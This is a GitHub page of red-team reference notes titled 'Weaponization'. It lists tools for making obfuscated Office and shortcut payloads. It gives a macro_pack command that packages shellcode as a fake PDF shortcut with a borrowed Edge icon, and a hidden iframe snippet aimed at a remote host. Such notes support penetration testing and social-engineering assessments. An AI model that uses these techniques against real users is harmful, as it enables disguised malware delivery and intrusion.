Skip to content

Latest commit

 

History

History
35 lines (23 loc) · 1.62 KB

2-Weaponization.md

File metadata and controls

35 lines (23 loc) · 1.62 KB

2 Weaponization

Table of Contents

Tooling

Name Description URL
macro_pack macro_pack is a tool by @EmericNasi used to automatize obfuscation and generation of Office documents, VB scripts, shortcuts, and other formats for pentest, demo, and social engineering assessments. https://github.com/sevagas/macro_pack
spoofing-office-macro PoC of a VBA macro spawning a process with a spoofed parent and command line. https://github.com/christophetd/spoofing-office-macro

macro_pack

PS C:\macro_pack_pro> echo .\<FILE>.bin | marco_pack.exe -t SHELLCODE -G .\<FILE>.pdf.lnk --icon='C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,13' --hta-macro --bypass

Malicious iFrame

<iframe src="<RHOST>" width="0" height="0" frameborder="0" tabindex="-1" title="empty" style=visibility:hidden;display:none"></iframe>

Previous

Next